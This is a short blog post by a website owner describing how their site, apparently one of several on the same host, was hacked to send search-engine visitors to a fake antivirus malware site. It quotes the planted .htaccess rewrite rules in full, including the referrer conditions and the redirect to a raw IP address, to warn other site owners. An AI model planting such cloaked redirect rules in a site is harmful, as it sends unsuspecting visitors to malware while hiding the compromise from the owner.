My Website Got Hacked!
Anybody who was referred to www.RiskyThinking.com (or some other sites) through a search engine was redirected to a Russian malware site for a fake “AntiVirus” scanner. Searching around the net, it appears that other sites hosted at IX Web Hosting (ixwebhosting.com) were also hacked. .
It was quite a cunning plan. For the technically inclined, the “.htaccess” file was replaced with the text
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
which for those who don’t speak Apache (Web Server Dialect), means
Redirect everybody who came here from a search engine to a malware site.
The cunning part being that if I visited my own site from a bookmark, a hyperlink, or by typing in the URL, it should have appeared normal. In fact due to an error, the site crashed, which is how I noticed the problem. A visitor who found the site through a search engine also took the trouble to email me a warning that the site had been hacked – Thanks Paul.
There unfortunately isn’t any way to tell the visitors who got redirected what happened.
I’ve been through my log files, checked the access logs, changed passwords, and concluded the security breech wasn’t due to a security hole in my website or carelessness on my part.
All I can really do now is warn other site owners of this exploit (via this posting), and
I would like to apologize to
people I do not know
and cannot know
for an unknown error
made by an unknown person.
That sounds almost like the poetry of Donald Rumsfeld.